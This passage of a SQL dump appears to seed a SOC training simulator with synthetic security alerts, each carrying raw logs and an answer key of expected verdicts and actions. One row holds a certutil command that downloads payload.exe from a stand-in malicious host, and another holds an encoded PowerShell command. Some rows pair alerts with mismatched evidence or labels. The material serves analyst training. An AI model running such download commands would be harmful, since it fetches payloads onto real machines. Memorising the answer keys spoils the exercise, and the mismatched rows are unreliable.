2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:45:19Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda-function-123\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 lambda_function.py --access-key ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.768Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:45:19Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda-function-123\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 lambda_function.py --access-key ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.768Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:45:19Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda-function-123\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 lambda_function.py --access-key ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1623, 'Wiz Detects Misconfigured GCP Firewall', 'medium', 'Wiz', 'A GCP firewall rule was found allowing open access from the internet to internal services, potentially exposing sensitive data.', 'Misconfiguration', 'T1133', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:05:40Z\",\"event_type\":\"config_change\",\"src_ip\":\"192.168.3.20\",\"dst_ip\":\"0.0.0.0/0\",\"username\":\"firewall_admin\",\"hostname\":\"gcp-firewall\",\"request_body\":\"\",\"command_line\":\"gcloud compute firewall-rules create open-access-rule --allow tcp:80,tcp:443 --source-ranges 0.0.0.0/0\"}', '2026-03-15 19:29:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"0.0.0.0/0\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Rule granting open access from the internet\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"gcloud compute firewall-rules create open-access-rule --allow tcp:80,tcp:443 --source-ranges 0.0.0.0/0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicative of misconfiguration leading to potential data exposure\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The misconfiguration allows unrestricted internet access to internal services, potentially exposing sensitive data.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:05:40Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"0.0.0.0/0\\\",\\\"username\\\":\\\"firewall_admin\\\",\\\"hostname\\\":\\\"gcp-firewall\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"gcloud compute firewall-rules create open-access-rule --allow tcp:80,tcp:443 --source-ranges 0.0.0.0/0\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:05:40Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"0.0.0.0/0\\\",\\\"username\\\":\\\"firewall_admin\\\",\\\"hostname\\\":\\\"gcp-firewall\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"gcloud compute firewall-rules create open-access-rule --allow tcp:80,tcp:443 --source-ranges 0.0.0.0/0\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:05:40Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"0.0.0.0/0\\\",\\\"username\\\":\\\"firewall_admin\\\",\\\"hostname\\\":\\\"gcp-firewall\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"gcloud compute firewall-rules create open-access-rule --allow tcp:80,tcp:443 --source-ranges 0.0.0.0/0\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:05:40Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"0.0.0.0/0\\\",\\\"username\\\":\\\"firewall_admin\\\",\\\"hostname\\\":\\\"gcp-firewall\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"gcloud compute firewall-rules create open-access-rule --allow tcp:80,tcp:443 --source-ranges 0.0.0.0/0\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:05:40Z\\\",\\\"event_type\\\":\\\"config_change\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"0.0.0.0/0\\\",\\\"username\\\":\\\"firewall_admin\\\",\\\"hostname\\\":\\\"gcp-firewall\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"gcloud compute firewall-rules create open-access-rule --allow tcp:80,tcp:443 --source-ranges 0.0.0.0/0\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1624, 'False Positive: AWS GuardDuty S3 Bucket Access', 'medium', 'AWS GuardDuty', 'An alert was triggered for unusual access to an S3 bucket by an external IP, but it was a scheduled test by a security team.', 'Data Access', 'T1530', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:55:00Z\",\"event_type\":\"data_access\",\"src_ip\":\"203.0.113.200\",\"dst_ip\":\"192.168.1.50\",\"username\":\"security_test_user\",\"hostname\":\"s3-bucket-tester\",\"request_body\":\"\",\"command_line\":\"aws s3 ls s3://test-bucket\"}', '2026-03-15 19:29:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"IP associated with known security team testing operations\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"security_test_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Account used by the security team for scheduled tests\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The access was part of a planned test by the security team, not a malicious attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:55:00Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"security_test_user\\\",\\\"hostname\\\":\\\"s3-bucket-tester\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3 ls 
s3://test-bucket\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:55:00Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"security_test_user\\\",\\\"hostname\\\":\\\"s3-bucket-tester\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3 ls s3://test-bucket\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:55:00Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"security_test_user\\\",\\\"hostname\\\":\\\"s3-bucket-tester\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3 ls s3://test-bucket\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:55:00Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"security_test_user\\\",\\\"hostname\\\":\\\"s3-bucket-tester\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3 ls s3://test-bucket\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:55:00Z\\\",\\\"event_type\\\":\\\"data_access\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"security_test_user\\\",\\\"hostname\\\":\\\"s3-bucket-tester\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws s3 ls s3://test-bucket\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1625, 'Suspicious PowerShell Execution with Encoded Command', 'high', 'Velociraptor', 'A PowerShell process was detected executing an encoded command on a critical server. This behavior is consistent with attempts to evade detection during a ransomware attack.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:45:13Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"admin_user\",\"hostname\":\"finance-server\",\"request_body\":\"\",\"command_line\":\"powershell.exe -enc JAB3AGUAYgBhAHIAbQBlAHQAZQByAHAAbwB3AGUAcgBzAGgAZQBsAGwA\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc JAB3AGUAYgBhAHIAbQBlAHQAZQByAHAAbwB3AGUAcgBzAGgAZQBsAGwA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command often associated with malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the finance server.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command is a strong indicator of malicious activity intended to evade detection. Decode the -enc payload (Base64 of UTF-16LE text) and check the parent process before acting, since -enc is also used by legitimate admin tooling; the verdict should rest on the decoded content, not on the encoding alone.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.788Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"finance-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGUAYgBhAHIAbQBlAHQAZQByAHAAbwB3AGUAcgBzAGgAZQBsAGwA\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.788Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"finance-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGUAYgBhAHIAbQBlAHQAZQByAHAAbwB3AGUAcgBzAGgAZQBsAGwA\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.788Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"finance-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGUAYgBhAHIAbQBlAHQAZQByAHAAbwB3AGUAcgBzAGgAZQBsAGwA\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.788Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"finance-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGUAYgBhAHIAbQBlAHQAZQByAHAAbwB3AGUAcgBzAGgAZQBsAGwA\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.788Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:13Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"finance-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB3AGUAYgBhAHIAbQBlAHQAZQByAHAAbwB3AGUAcgBzAGgAZQBsAGwA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1626, 'Failed Login Attempts from Foreign IP', 'medium', 'Firewall', 'Multiple failed login attempts were detected from a foreign IP address, indicating a potential brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:33:44Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.20\",\"username\":\"jdoe\",\"hostname\":\"corp-server\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":34}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal corporate server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Employee account targeted in brute force attempt.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed login attempts from a known malicious IP suggest a brute force attack.\"}', 'Advanced', 'IR', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1627, 'LOLBin Usage Detected: Certutil Download', 'critical', 'KAPE', 'Certutil was used to download a file from an external server. This technique is often employed in ransomware operations to download payloads.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:15:28Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"198.51.100.100\",\"username\":\"system\",\"hostname\":\"workstation-01\",\"request_body\":\"\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\temp\\\\payload.exe\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\temp\\\\payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command used to download malware payloads in recent attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.example.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Malicious URL hosting ransomware payload.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of an employee workstation.\"}}],\"expected_actions\":[\"isolate_host\",\"block_url\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Certutil is being used as a living-off-the-land binary to download malware, indicative of an ongoing attack.\"}', 'Advanced', 'IR', 7, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.821Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:28Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"workstation-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.821Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:28Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"workstation-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.821Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:28Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"workstation-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.821Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:28Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"workstation-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.821Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:28Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"system\\\",\\\"hostname\\\":\\\"workstation-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe C:\\\\\\\\temp\\\\\\\\payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1628, 'Massive Data Exfiltration Alert', 'critical', 'Splunk', 'Unusually high volume of data was transferred to an external IP, indicating potential data exfiltration.', 'Data Exfil', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:05:33Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.101\",\"username\":\"data.admin\",\"hostname\":\"data-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal server IP.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The volume of data transferred to an external IP suggests an attempt to exfiltrate sensitive information.\"}', 'Advanced', 'IR', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:33Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"data.admin\\\",\\\"hostname\\\":\\\"data-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:33Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"data.admin\\\",\\\"hostname\\\":\\\"data-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:33Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"data.admin\\\",\\\"hostname\\\":\\\"data-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:33Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"data.admin\\\",\\\"hostname\\\":\\\"data-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 